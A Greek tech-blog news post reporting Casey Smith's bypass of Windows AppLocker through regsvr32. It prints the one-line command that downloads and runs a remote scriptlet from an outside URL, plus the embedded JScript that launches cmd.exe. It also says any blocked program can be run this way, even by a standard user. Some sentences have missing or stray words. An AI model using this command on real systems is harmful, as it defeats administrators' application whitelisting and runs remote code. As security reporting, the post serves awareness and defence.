Παράκαμψη του AppLocker των Windows

Αν χρησιμοποιείτε το της για να κλειδώσετε υπολογιστές με στο γραφείο ή το σχολείο σας, τότε έχουμε άσχημα νέα για σας.

Ένας ερευνητής ασφαλείας ανακάλυψε έναν τρόπο να παρακάμψει την Whitelist του λογισμικού των Windows και να τρέξει αυθαίρετες εφαρμογές.access granted AppLocker

Η εφαρμογή AppLocker επιτρέπει στους IT διαχειριστές την διαχείριση μεγάλων δικτύων. Μπορούν να καθορίζουν ποια προγράμματα και ποια scripts μπορούν να τρέξουν οι χρήστες.

Η υπηρεσία ήρθε για πρώτη φορά με τα , και ο στόχος της ήταν να σταματήσει την έναρξη προγραμμάτων που δεν σχετίζονται με την εργασία, ή κακόβουλες εφαρμογές, ή για να να σταματήσουν τους τελικούς χρήστες να τρέχουν προγράμματα που χρησιμοποιεί το τμήμα υποστήριξης της εταιρείας ή του οργανισμού.

Ο ερευνητής ασφαλείας Casey Smith ανακάλυψε έναν τρόπο παράκαμψης του AppLocker. Ο τρόπος παράκαμψης είναι πολύ απλός και θα τον βρείτε παρακάτω με μια γραμμή κώδικα: μια αρκετά απλή εντολή.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Αν τρέξετε την παραπάνω εντολή στα Windows λέτε στο λειτουργικό να κατεβάσει ένα αρχείο XML από το διαδίκτυο, το οποίο δίνει εντολή να τρέξει το cmd.exe.

  Χρήση του Windows Update Delivery Optimization σε τοπικά δίκτυα

Η μαγεία εδώ είναι ότι αν αλλάξετε το cmd.exe με οποιοδήποτε πρόγραμμα έχει μπλοκαριστεί με το AppLocker θα ξεκινήσει.

“Δεν είναι καλά τεκμηριωμένο ότι το Regsvr32.exe δεν μπορεί να δεχτεί μια διεύθυνση URL για ένα script,” ανέφερε ο Smith.
Στην παραπάνω περίπτωση, το ενσωματωμένο JavaScript χρησιμοποιεί ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Είναι μια περίπτωση αλυσιδωτής σύνδεσης διαφόρων στοιχείων στο λαβύρινθο του κώδικα που χρησιμοποιούν τα Windows της Microsoft. Όλα scripts της JavaScript, της Visual Basic και του Powershell μπορούν να τρέξουν από το διαδίκτυο, ή ένα τοπικό αρχείο, μέσω του regsvr32, σύμφωνα με τον Smith.

Έτσι ακόμα και είστε συνδεδεμένοι στο ως απλός χρήστης ή επισκέπτης μπορείτε να χρησιμοποιήσετε το hack για να παρακάμψετε το AppLock.

PoC’s

Written by giorgos

Ο Γιώργος ακόμα αναρωτιέται τι κάνει εδώ....

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).


  +  48  =  53